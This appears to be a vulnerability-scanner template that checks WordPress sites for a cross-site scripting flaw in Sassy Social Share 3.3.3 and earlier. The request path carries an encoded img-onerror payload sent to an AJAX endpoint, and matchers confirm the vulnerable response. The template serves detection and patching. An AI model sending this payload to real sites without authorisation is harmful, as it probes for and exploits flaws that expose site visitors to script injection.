id: sassy-social-share-xss info: name: Sassy Social Share <=3.3.3 - Cross-Site Scripting author: Random_Robbie severity: medium description: | WordPress Sassy Social Share 3.3.3 and prior is vulnerable to cross-site scripting because certain AJAX endpoints return JSON data with no Content-Type header set and then use the default text/html. In other words, any JSON that has HTML will be rendered as such. reference: - https://wpscan.com/vulnerability/4631519b-2060-43a0-b69b-b3d7ed94c705 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 tags: xss,wp,wpscan,wordpress,wp-plugin,sassy metadata: max-request: 1 http: - method: GET path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]=" matchers-condition: and matchers: - type: word part: body words: - '[{"":""}]' - 'facebook' - 'twitter' condition: and - type: word part: header words: - 'application/json' negative: true - type: status status: - 200